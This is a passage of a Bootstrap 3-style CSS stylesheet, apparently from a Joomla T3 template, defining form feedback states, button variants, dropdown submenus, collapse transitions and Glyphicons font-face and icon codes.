  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
select.form-group-lg .form-control {
  height: 45px;
  line-height: 45px;
}
textarea.form-group-lg .form-control,
select[multiple].form-group-lg .form-control {
  height: auto;
}
.form-group-lg .form-control-static {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  min-height: 38px;
}
.has-feedback {
  position: relative;
}
.has-feedback .form-control {
  padding-right: 42.5px;
}
.form-control-feedback {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 2;
  display: block;
  width: 34px;
  height: 34px;
  line-height: 34px;
  text-align: center;
  pointer-events: none;
}
.input-lg + .form-control-feedback {
  width: 45px;
  height: 45px;
  line-height: 45px;
}
.input-sm + .form-control-feedback {
  width: 30px;
  height: 30px;
  line-height: 30px;
}
.has-success .help-block,
.has-success .control-label,
.has-success .radio,
.has-success .checkbox,
.has-success .radio-inline,
.has-success .checkbox-inline,
.has-success.radio label,
.has-success.checkbox label,
.has-success.radio-inline label,
.has-success.checkbox-inline label {
  color: #468847;
}
.has-success .form-control {
  border-color: #468847;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-success .form-control:focus {
  border-color: #356635;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
}
.has-success .input-group-addon {
  color: #468847;
  border-color: #468847;
  background-color: #dff0d8;
}
.has-success .form-control-feedback {
  color: #468847;
}
.has-warning .help-block,
.has-warning .control-label,
.has-warning .radio,
.has-warning .checkbox,
.has-warning .radio-inline,
.has-warning .checkbox-inline,
.has-warning.radio label,
.has-warning.checkbox label,
.has-warning.radio-inline label,
.has-warning.checkbox-inline label {
  color: #c09853;
}
.has-warning .form-control {
  border-color: #c09853;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-warning .form-control:focus {
  border-color: #a47e3c;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
}
.has-warning .input-group-addon {
  color: #c09853;
  border-color: #c09853;
  background-color: #fcf8e3;
}
.has-warning .form-control-feedback {
  color: #c09853;
}
.has-error .help-block,
.has-error .control-label,
.has-error .radio,
.has-error .checkbox,
.has-error .radio-inline,
.has-error .checkbox-inline,
.has-error.radio label,
.has-error.checkbox label,
.has-error.radio-inline label,
.has-error.checkbox-inline label {
  color: #b94a48;
}
.has-error .form-control {
  border-color: #b94a48;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-error .form-control:focus {
  border-color: #953b39;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
}
.has-error .input-group-addon {
  color: #b94a48;
  border-color: #b94a48;
  background-color: #f2dede;
}
.has-error .form-control-feedback {
  color: #b94a48;
}
.has-feedback label ~ .form-control-feedback {
  top: 25px;
}
.has-feedback label.sr-only ~ .form-control-feedback {
  top: 0;
}
.help-block {
  display: block;
  margin-top: 5px;
  margin-bottom: 10px;
  color: #848484;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .form-inline .form-control-static {
    display: inline-block;
  }
  .form-inline .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .form-inline .input-group .input-group-addon,
  .form-inline .input-group .input-group-btn,
  .form-inline .input-group .form-control {
    width: auto;
  }
  .form-inline .input-group > .form-control {
    width: 100%;
  }
  .form-inline .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio,
  .form-inline .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio label,
  .form-inline .checkbox label {
    padding-left: 0;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    position: relative;
    margin-left: 0;
  }
  .form-inline .has-feedback .form-control-feedback {
    top: 0;
  }
}
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .radio,
.form-horizontal .checkbox {
  min-height: 27px;
}
.form-horizontal .form-group {
  margin-left: -15px;
  margin-right: -15px;
}
@media (min-width: 768px) {
  .form-horizontal .control-label {
    text-align: right;
    margin-bottom: 0;
    padding-top: 7px;
  }
}
.form-horizontal .has-feedback .form-control-feedback {
  right: 15px;
}
@media (min-width: 768px) {
  .form-horizontal .form-group-lg .control-label {
    padding-top: 14.3px;
  }
}
@media (min-width: 768px) {
  .form-horizontal .form-group-sm .control-label {
    padding-top: 6px;
  }
}
.btn {
  display: inline-block;
  margin-bottom: 0;
  font-weight: normal;
  text-align: center;
  vertical-align: middle;
  touch-action: manipulation;
  cursor: pointer;
  background-image: none;
  border: 1px solid transparent;
  white-space: nowrap;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  border-radius: 0px;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.btn:focus,
.btn:active:focus,
.btn.active:focus,
.btn.focus,
.btn:active.focus,
.btn.active.focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.btn:hover,
.btn:focus,
.btn.focus {
  color: #333333;
  text-decoration: none;
}
.btn:active,
.btn.active {
  outline: 0;
  background-image: none;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn.disabled,
.btn[disabled],
fieldset[disabled] .btn {
  cursor: not-allowed;
  pointer-events: none;
  opacity: 0.65;
  filter: alpha(opacity=65);
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-default {
  color: #333333;
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default:hover,
.btn-default:focus,
.btn-default.focus,
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #adadad;
}
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  background-image: none;
}
.btn-default.disabled,
.btn-default[disabled],
fieldset[disabled] .btn-default,
.btn-default.disabled:hover,
.btn-default[disabled]:hover,
fieldset[disabled] .btn-default:hover,
.btn-default.disabled:focus,
.btn-default[disabled]:focus,
fieldset[disabled] .btn-default:focus,
.btn-default.disabled.focus,
.btn-default[disabled].focus,
fieldset[disabled] .btn-default.focus,
.btn-default.disabled:active,
.btn-default[disabled]:active,
fieldset[disabled] .btn-default:active,
.btn-default.disabled.active,
.btn-default[disabled].active,
fieldset[disabled] .btn-default.active {
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default .badge {
  color: #ffffff;
  background-color: #333333;
}
.btn-primary {
  color: #ffffff;
  background-color: #454444;
  border-color: #383737;
}
.btn-primary:hover,
.btn-primary:focus,
.btn-primary.focus,
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #191919;
}
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  background-image: none;
}
.btn-primary.disabled,
.btn-primary[disabled],
fieldset[disabled] .btn-primary,
.btn-primary.disabled:hover,
.btn-primary[disabled]:hover,
fieldset[disabled] .btn-primary:hover,
.btn-primary.disabled:focus,
.btn-primary[disabled]:focus,
fieldset[disabled] .btn-primary:focus,
.btn-primary.disabled.focus,
.btn-primary[disabled].focus,
fieldset[disabled] .btn-primary.focus,
.btn-primary.disabled:active,
.btn-primary[disabled]:active,
fieldset[disabled] .btn-primary:active,
.btn-primary.disabled.active,
.btn-primary[disabled].active,
fieldset[disabled] .btn-primary.active {
  background-color: #454444;
  border-color: #383737;
}
.btn-primary .badge {
  color: #454444;
  background-color: #ffffff;
}
.btn-success {
  color: #ffffff;
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success:hover,
.btn-success:focus,
.btn-success.focus,
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #255d31;
}
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  background-image: none;
}
.btn-success.disabled,
.btn-success[disabled],
fieldset[disabled] .btn-success,
.btn-success.disabled:hover,
.btn-success[disabled]:hover,
fieldset[disabled] .btn-success:hover,
.btn-success.disabled:focus,
.btn-success[disabled]:focus,
fieldset[disabled] .btn-success:focus,
.btn-success.disabled.focus,
.btn-success[disabled].focus,
fieldset[disabled] .btn-success.focus,
.btn-success.disabled:active,
.btn-success[disabled]:active,
fieldset[disabled] .btn-success:active,
.btn-success.disabled.active,
.btn-success[disabled].active,
fieldset[disabled] .btn-success.active {
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success .badge {
  color: #3e9b52;
  background-color: #ffffff;
}
.btn-info {
  color: #ffffff;
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info:hover,
.btn-info:focus,
.btn-info.focus,
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  color: #ffffff;
  background-color: #007399;
  border-color: #005875;
}
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  background-image: none;
}
.btn-info.disabled,
.btn-info[disabled],
fieldset[disabled] .btn-info,
.btn-info.disabled:hover,
.btn-info[disabled]:hover,
fieldset[disabled] .btn-info:hover,
.btn-info.disabled:focus,
.btn-info[disabled]:focus,
fieldset[disabled] .btn-info:focus,
.btn-info.disabled.focus,
.btn-info[disabled].focus,
fieldset[disabled] .btn-info.focus,
.btn-info.disabled:active,
.btn-info[disabled]:active,
fieldset[disabled] .btn-info:active,
.btn-info.disabled.active,
.btn-info[disabled].active,
fieldset[disabled] .btn-info.active {
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info .badge {
  color: #0099cc;
  background-color: #ffffff;
}
.btn-warning {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning:hover,
.btn-warning:focus,
.btn-warning.focus,
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #a85a00;
}
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  background-image: none;
}
.btn-warning.disabled,
.btn-warning[disabled],
fieldset[disabled] .btn-warning,
.btn-warning.disabled:hover,
.btn-warning[disabled]:hover,
fieldset[disabled] .btn-warning:hover,
.btn-warning.disabled:focus,
.btn-warning[disabled]:focus,
fieldset[disabled] .btn-warning:focus,
.btn-warning.disabled.focus,
.btn-warning[disabled].focus,
fieldset[disabled] .btn-warning.focus,
.btn-warning.disabled:active,
.btn-warning[disabled]:active,
fieldset[disabled] .btn-warning:active,
.btn-warning.disabled.active,
.btn-warning[disabled].active,
fieldset[disabled] .btn-warning.active {
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.btn-danger {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger:hover,
.btn-danger:focus,
.btn-danger.focus,
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  color: #ffffff;
  background-color: #990000;
  border-color: #750000;
}
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  background-image: none;
}
.btn-danger.disabled,
.btn-danger[disabled],
fieldset[disabled] .btn-danger,
.btn-danger.disabled:hover,
.btn-danger[disabled]:hover,
fieldset[disabled] .btn-danger:hover,
.btn-danger.disabled:focus,
.btn-danger[disabled]:focus,
fieldset[disabled] .btn-danger:focus,
.btn-danger.disabled.focus,
.btn-danger[disabled].focus,
fieldset[disabled] .btn-danger.focus,
.btn-danger.disabled:active,
.btn-danger[disabled]:active,
fieldset[disabled] .btn-danger:active,
.btn-danger.disabled.active,
.btn-danger[disabled].active,
fieldset[disabled] .btn-danger.active {
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.btn-link {
  color: #454444;
  font-weight: normal;
  border-radius: 0;
}
.btn-link,
.btn-link:active,
.btn-link.active,
.btn-link[disabled],
fieldset[disabled] .btn-link {
  background-color: transparent;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-link,
.btn-link:hover,
.btn-link:focus,
.btn-link:active {
  border-color: transparent;
}
.btn-link:hover,
.btn-link:focus {
  color: #1e1e1e;
  text-decoration: underline;
  background-color: transparent;
}
.btn-link[disabled]:hover,
fieldset[disabled] .btn-link:hover,
.btn-link[disabled]:focus,
fieldset[disabled] .btn-link:focus {
  color: #999999;
  text-decoration: none;
}
.btn-lg,
.btn-group-lg > .btn {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0px;
}
.btn-sm,
.btn-group-sm > .btn {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
.btn-xs,
.btn-group-xs > .btn {
  padding: 1px 5px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0px;
}
.btn-block {
  display: block;
  width: 100%;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
  width: 100%;
}
.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  left: 100%;
  margin-top: -5px;
  margin-left: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0px;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: right;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 0 5px 5px;
  border-left-color: #111111;
  margin-top: 5px;
  margin-right: -5px;
}
.dropdown-submenu.open > a:after {
  border-left-color: #ffffff;
}

.fade {
  opacity: 0;
  -webkit-transition: opacity 0.15s linear;
  -o-transition: opacity 0.15s linear;
  transition: opacity 0.15s linear;
}
.fade.in {
  opacity: 1;
}
.collapse {
  display: none;
}
.collapse.in {
  display: block;
}
tr.collapse.in {
  display: table-row;
}
tbody.collapse.in {
  display: table-row-group;
}
.collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  -webkit-transition-property: height, visibility;
  transition-property: height, visibility;
  -webkit-transition-duration: 0.35s;
  transition-duration: 0.35s;
  -webkit-transition-timing-function: ease;
  transition-timing-function: ease;
}
@font-face {
  font-family: 'Glyphicons Halflings';
  src: url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot');
  src: url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot?#iefix') format('embedded-opentype'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff2') format('woff2'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff') format('woff'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.ttf') format('truetype'), url('../../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular') format('svg');
}
.glyphicon {
  position: relative;
  top: 1px;
  display: inline-block;
  font-family: 'Glyphicons Halflings';
  font-style: normal;
  font-weight: normal;
  line-height: 1;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.glyphicon-asterisk:before {
  content: "\2a";
}
.glyphicon-plus:before {
  content: "\2b";
}
.glyphicon-euro:before,
.glyphicon-eur:before {
  content: "\20ac";
}
.glyphicon-minus:before {
  content: "\2212";
}
.glyphicon-cloud:before {
  content: "\2601";
}
.glyphicon-envelope:before {
  content: "\2709";
}
.glyphicon-pencil:before {
  content: "\270f";
}
.glyphicon-glass:before {
  content: "\e001";
}
.glyphicon-music:before {
  content: "\e002";
}
.glyphicon-search:before {
  content: "\e003";
}
.glyphicon-heart:before {
  content: "\e005";
}
.glyphicon-star:before {
  content: "\e006";
}
.glyphicon-star-empty:before {
  content: "\e007";
}
.glyphicon-user:before {
  content: "\e008";
}
.glyphicon-film:before {
  content: "\e009";
}
.glyphicon-th-large:before {
  content: "\e010";
}
.glyphicon-th:before {
  content: "\e011";
}
.glyphicon-th-list:before {
  content: "\e012";
}
.glyphicon-ok:before {
  content: "\e013";
}
.glyphicon-remove:before {
  content: "\e014";
}
.glyphicon-zoom-in:before {
  content: "\e015";
}
.glyphicon-zoom-out:before {
  content: "\e016";
}
.glyphicon-off:before {
  content: "\e017";
}
.glyphicon-signal:before {
  content: "\e018";
}
.glyphicon-cog:before {
  content: "\e019";
}
.glyphicon-trash:before {
  content: "\e020";
}
.glyphicon-home:before {
  content: "\e021";
}
.glyphicon-file:before {
  content: "\e022";
}
.glyphicon-time:before {
  content: "\e023";
}
.glyphicon-road:before {
  content: "\e024";
}
.glyphicon-download-alt:before {
  content: "\e025";
}
.glyphicon-download:before {
  content: "\e026";
}
.glyphicon-upload:before {
  content: "\e027";
}
.glyphicon-inbox:before {
  content: "\e028";
}
.glyphicon-play-circle:before {
  content: "\e029";
}
.glyphicon-repeat:before {
  content: "\e030";
}
.glyphicon-refresh:before {
  content: "\e031";
}
.glyphicon-list-alt:before {
  content: "\e032";
}
.glyphicon-lock:before {
  content: "\e033";
}
.glyphicon-flag:before {
  content: "\e034";
}
.glyphicon-headphones:before {
  content: "\e035";
}
.glyphicon-volume-off:before {
  content: "\e036";
}
.glyphicon-volume-down:before {
  content: "\e037";
}
.glyphicon-volume-up:before {
  content: "\e038";
}
.glyphicon-qrcode:before {
  content: "\e039";
}
.glyphicon-barcode:before {
  content: "\e040";
}
.glyphicon-tag:before {
  content: "\e041";
}
.glyphicon-tags:before {
  content: "\e042";
}
.glyphicon-book:before {
  content: "\e043";
}
.glyphicon-bookmark:before {
  content: "\e044";
}
.glyphicon-print:before {
  content: "\e045";
}
.glyphicon-camera:before {
  content: "\e046";
}
.glyphicon-font:before {
  content: "\e047";
}
.glyphicon-bold:before {
  content: "\e048";
}
.glyphicon-italic:before {
  content: "\e049";
}
.glyphicon-text-height:before {
  content: "\e050";
}
.glyphicon-text-width:before {
  content: "\e051";
}
.glyphicon-align-left:before {
  content: "\e052";
}
.glyphicon-align-center:before {
  content: "\e053";
}
.glyphicon-align-right:before {
  content: "\e054";
}
.glyphicon-align-justify:before {
  content: "\e055";
}
.glyphicon-list:before {
  content: "\e056";
}
.glyphicon-indent-left:before {
  content: "\e057";
}
.glyphicon-indent-right:before {
  content: "\e058";
}
.glyphicon-facetime-video:before {
  content: "\e059";
}
.glyphicon-picture:before {
  content: "\e060";
}
.glyphicon-map-marker:before {
  content: "\e062";
}
.glyphicon-adjust:before {
  content: "\e063";
}
.glyphicon-tint:before {
  content: "\e064";
}
.glyphicon-edit:before {
  content: "\e065";
}
.glyphicon-share:before {
  content: "\e066";
}
.glyphicon-check:before {
  content: "\e067";
}
.glyphicon-move:before {
  content: "\e068";
}
.glyphicon-step-backward:before {
  content: "\e069";
}
.glyphicon-fast-backward:before {
  content: "\e070";
}
.glyphicon-backward:before {
  content: "\e071";
}
.glyphicon-play:before {
  content: "\e072";
}
.glyphicon-pause:before {
  content: "\e073";
}
.glyphicon-stop:before {
  content: "\e074";
}
.glyphicon-forward:before {
  content: "\e075";
}
.glyphicon-fast-forward:before {
  content: "\e076";
}
.glyphicon-step-forward:before {
  content: "\e077";
}
.glyphicon-eject:before {
  content: "\e078";
}
.glyphicon-chevron-left:before {
  content: "\e079";
}
.glyphicon-chevron-right:before {
  content: "\e080";
}
.glyphicon-plus-sign:before {
  content: "\e081";
}
.glyphicon-minus-sign:before {
  content: "\e082";
}
.glyphicon-remove-sign:before {
  content: "\e083";
}
.glyphicon-ok-sign:before {
  content: "\e084";
}
.glyphicon-question-sign:before {
  content: "\e085";
}
.glyphicon-info-sign:before {
  content: "\e086";
}
.glyphicon-screenshot:before {
  content: "\e087";
}
.glyphicon-remove-circle:before {
  content: "\e088";
}
.glyphicon-ok-circle:before {
  content: "\e089";
}
.glyphicon-ban-circle:before {
  content: "\e090";
}
.glyphicon-arrow-left:before {
  content: "\e091";
}
.glyphicon-arrow-right:before {
  content: "\e092";
}
.glyphicon-arrow-up:before {
  content: "\e093";
}
.glyphicon-arrow-down:before {
  content: "\e094";
}
.glyphicon-share-alt:before {
  content: "\e095";
}
.glyphicon-resize-full:before {
  content: "\e096";
}
.glyphicon-resize-small:before {
  content: "\e097";
}
.glyphicon-exclamation-sign:before {
  content: "\e101";
}
.glyphicon-gift:before {
  content: "\e102";
}
.glyphicon-leaf:before {
  content: "\e103";
}
.glyphicon-fire:before {
  content: "\e104";
}
.glyphicon-eye-open:before {
  content: "\e105";
}
.glyphicon-eye-close:before {
  content: "\e106";
}
.glyphicon-warning-sign:before {
  content: "\e107";
}
.glyphicon-plane:before {
  content: "\e108";
}
.glyphicon-calendar:before {
  content: "\e109";
}
.glyphicon-random:before {
  content: "\e110";
}
.glyphicon-comment:before {
  content: "\e111";
}
.glyphicon-magnet:before {
  content: "\e112";
}
.glyphicon-chevron-up:before {
  content: "\e113";
}
.glyphicon-chevron-down:before {
  content: "\e114";
}
.glyphicon-retweet:before {
  content: "\e115";
}
.glyphicon-shopping-cart:before {
  content: "\e116";
}
.glyphicon-folder-close:before {
  content: "\e117";
}
.glyphicon-folder-open:before {
  content: "\e118";
}
.glyphicon-resize-vertical:before {
  content: "\e119";
}
.glyphicon-resize-horizontal:before {
  content: "\e120";
}
.glyphicon-hdd:before {
  content: "\e121";
}
.glyphicon-bullhorn:before {
  content: "\e122";
}
.glyphicon-bell:before {
  content: "\e123";
}
.glyphicon-certificate:before {
  content: "\e124";
}
.glyphicon-thumbs-up:before {
  content: "\e125";
}
.glyphicon-thumbs-down:before {
  content: "\e126";
}
.glyphicon-hand-right:before {
  content: "\e127";
}
.glyphicon-hand-left:before {
  content: "\e128";
}
.glyphicon-hand-up:before {
  content: "\e129";
}
.glyphicon-hand-down:before {
  content: "\e130";
}
.glyphicon-circle-arrow-right:before {
  content: "\e131";
}
.glyphicon-circle-arrow-left:before {
  content: "\e132";
}
.glyphicon-circle-arrow-up:before {
  content: "\e133";
}
.glyphicon-circle-arrow-down:before {
  content: "\e134";
}
.glyphicon-globe:before {
  content: "\e135";
}
.glyphicon-wrench:before {
  content: "\e136";
}
.glyphicon-tasks:before {
  content: "\e137";
}
.glyphicon-filter:before {
  content: "\e138";
}
.glyphicon-briefcase:before {
  content: "\e139";
}
.glyphicon-fullscreen:before {
  content: "\e140";
}
.glyphicon-dashboard:before {
  content: "\e141";
}
.glyphicon-paperclip:before {
  content: "\e142";
}
.glyphicon-heart-empty:before {
  content: "\e143";
}
.glyphicon-link:before {
  content: "\e144";
}
.glyphicon-phone:before {
  content: "\e145";
}
.glyphicon-pushpin:before {
  content: "\e146";
}
.glyphicon-usd:before {
  content: "\e148";
}
.glyphicon-gbp:before {
  content: "\e149";
}
.glyphicon-sort:before {
  content: "\e150";
}
.glyphicon-sort-by-alphabet:before {
  content: "\e151";
}
.glyphicon-sort-by-alphabet-alt:before {
  content: "\e152";
}
.glyphicon-sort-by-order:before {
  content: "\e153";
}
.glyphicon-sort-by-order-alt:before {
  content: "\e154";
}
.glyphicon-sort-by-attributes:before {
  content: "\e155";
}
.glyphicon-sort-by-attributes-alt:before {
  content: "\e156";
}
.glyphicon-unchecked:before {
  content: "\e157";
}
.glyphicon-expand:before {
  content: "\e158";
}
.glyphicon-collapse-down:before {
  content: "\e159";
}
.glyphicon-collapse-up:before {
  content: "\e160";
}
.glyphicon-log-in:before {
  content: "\e161";
}
.glyphicon-flash:before {
  content: "\e162";
}
.glyphicon-log-out:before {
  content: "\e163";
}
.glyphicon-new-window:before {
  content: "\e164";
}
.glyphicon-record:before {
  content: "\e165";
}
.glyphicon-save:before {
  content: "\e166";
}
.glyphicon-open:before {
  content: "\e167";
}
.glyphicon-saved:before {
  content: "\e168";
}
.glyphicon-import:before {
  content: "\e169";
}
.glyphicon-export:before {
  content: "\e170";
}
.glyphicon-send:before {
  content: "\e171";
}
.glyphicon-floppy-disk:before {
  content: "\e172";
}
.glyphicon-floppy-saved:before {
  content: "\e173";
}
.glyphicon-floppy-remove:before {
  content: "\e174";
}
.glyphicon-floppy-save:before {
  content: "\e175";
}
.glyphicon-floppy-open:before {
  content: "\e176";
}
.glyphicon-credit-card:before {
  content: "\e177";
}
.glyphicon-transfer:before {
  content: "\e178";
}
.glyphicon-cutlery:before {
  content: "\e179";
}
.glyphicon-header:before {
  content: "\e180";
}
.glyphicon-compressed:before {
  content: "\e181";
}
.glyphicon-earphone:before {
  content: "\e182";
}
.glyphicon-phone-alt:before {
  content: "\e183";
}
.glyphicon-tower:before {
  content: "\e184";
}
.glyphicon-stats:before {
  content: "\e185";
}
.glyphicon-sd-video:before {
  content: "\e186";
}
.glyphicon-hd-video:before {
  content: "\e187";
}
.glyphicon-subtitles:before {
  content: "\e188";
}
.glyphicon-sound-stereo:before {
  content: "\e189";
}
.glyphicon-sound-dolby:before {
  content: "\e190";
}
.glyphicon-sound-5-1:before {
  content: "\e191";
}
.glyphicon-sound-6-1:before {
  content: "\e192";
}
.glyphicon-sound-7-1:before {
  content: "\e193";
}
.glyphicon-copyright-mark:before {
  content: "\e194";
}
.glyphicon-registration-mark:before {
  content: "\e195";
}
.glyphicon-cloud-download:before {
  content: "\e197";
}
.glyphicon-cloud-upload:before {
  content: "\e198";
}
.glyphicon-tree-conifer:before {
  content: "\e199";
}
.glyphicon-tree-deciduous:before {
  content: "\e200";
}
.glyphicon-cd:before {
  content: "\e201";
}
.glyphicon-save-file:before {
  content: "\e202";
}
.glyphicon-open-file:before {
  content: "\e203";
}
.glyphicon-level-up:before {
  content: "\e204";
}
.glyphicon-copy:before {
  content: "\e205";
}
.glyphicon-paste:before {
  content: "\e206";
}
.glyphicon-alert:before {
  content: "\e209";
}
.glyphicon-equalizer:before {
  content: "\e210";
}
.glyphicon-king:before {
  content: "\e211";
}
.glyphicon-queen:before {
  content: "\e212";
}
.glyphicon-pawn:before {
  content: "\e213";
}
.glyphicon-bishop:before {
  content: "\e214";
}
.glyphicon-knight:before {
  content: "\e215";
}
.glyphicon-baby-formula:before {
  content: "\e216";
}
.glyphicon-tent:before {
  content: "\26fa";
}
.glyphicon-blackboard:before {
  content: "\e218";
}
.glyphicon-bed:before {
  content: "\e219";
}
.glyphicon-apple:before {
  content: "\f8ff";
}
.glyphicon-erase:before {
  content: "\e221";
}
.glyphicon-hourglass:before {
  content: "\231b";
}
.glyphicon-lamp:before {
  content: "\e223";
}
.glyphicon-duplicate:before {
  content: "\e224";
}
.glyphicon-piggy-bank:before {
  content: "\e225";
}
.glyphicon-scissors:before {
  content: "\e226";
}
.glyphicon-bitcoin:before {
  content: "\e227";
}
.glyphicon-btc:before {
  content: "\e227";
}
.glyphicon-xbt:before {
  content: "\e227";
}
.glyphicon-yen:before {
  content: "\00a5";
}
.glyphicon-jpy:before {
  content: "\00a5";
}
.glyphicon-ruble:before {
  content: "\20bd";
}
.glyphicon-rub:before {
  content: "\20bd";
}
.glyphicon-scale:before {
  content: "\e230";
}
.glyphicon-ice-lolly:before {
  content: "\e231";
}
.glyphicon-ice-lolly-tasted:before {
  content: "\e232";
}
.glyphicon-education:before {
  content: "\e233";
}
.glyphicon-option-horizontal:before {
  content: "\e234";
}
.glyphicon-option-vertical:before {
  content: "\e235";
}
.glyphicon-menu-hamburger:before {
  content: "\e236";
}
.glyphicon-modal-window:before {
  content: "\e237";
}
.glyphicon-oil:before {
  content: "\e238";
}
.glyphicon-grain:before {
  content: "\e239";
}
.glyphicon-sunglasses:before {
  content: "\e240";
}
.glyphicon-text-size:before {
  content: "\e241";
}
.glyphicon-text-color:before {
  content: "\e242";
}
.glyphicon-text-background:before {
  content: "\e243";
}
.glyphicon-object-align-top:before {
  content: "\e244";
}
.glyphicon-object-align-bottom:before {
  content: "\e245";
}
.glyphicon-object-align-horizontal:before {
  content: "\e246";
}
.glyphicon-object-align-left:before {
  content: "\e247";
}
.glyphicon-object-align-vertical:before {
  content: "\e248";
}
.glyphicon-object-align-right:before {
  content: "\e249";
}
.glyphicon-triangle-right:before {
  content: "\e250";
}
.glyphicon-triangle-left:before {
  content: "\e251";
}
.glyphicon-triangle-bottom:before {
  content: "\e252";
}
.glyphicon-triangle-top:before {
  content: "\e253";
}
.glyphicon-console:before {
  content: "\e254";
}
.glyphicon-superscript:before {
  content: "\e255";
}
.glyphicon-subscript:before {
  content: "\e256";
}
.glyphicon-menu-left:before {
  content: "\e257";
}
.glyphicon-menu-right:before {
  content: "\e258";
}
.glyphicon-menu-down:before {
  content: "\e259";
}
.glyphicon-menu-up:before {
  content: "\e260";
}
.caret {
  display: inline-block;
  width: 0;
  height: 0;
  margin-left: 2px;
  vertical-align: middle;
  border-top: 4px dashed;
  border-right: 4px solid transparent;
  border-left: 4px solid transparent;
}
.dropup,
.dropdown {
  position: relative;
}
